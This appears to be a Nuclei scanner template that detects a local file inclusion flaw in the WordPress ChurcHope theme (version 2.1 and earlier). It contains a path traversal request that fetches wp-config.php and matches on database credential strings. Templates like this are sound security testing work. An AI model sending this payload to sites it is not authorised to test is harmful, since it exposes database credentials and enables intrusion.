id: churchope-lfi info: name: WordPress ChurcHope Theme <= 2.1 - Local File Inclusion author: dhiyaneshDK severity: high description: WordPress ChurcHope Theme <= 2.1 is susceptible to local file inclusion. The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. reference: - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 classification: cwe-id: CWE-22 metadata: max-request: 1 tags: wp,wpscan,wordpress,wp-theme,lfi http: - method: GET path: - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200 # digest: 4a0a00473045022073ebf76a9f08c56724ef1147173ce5a17f9001157ffce5f3a58388c5701dfebf022100cdd8ad857ca50cd7db3825668dac2aa679f7996f9e51344079fbeeaeb7f6a407:922c64590222798bb761d5b6d8e72950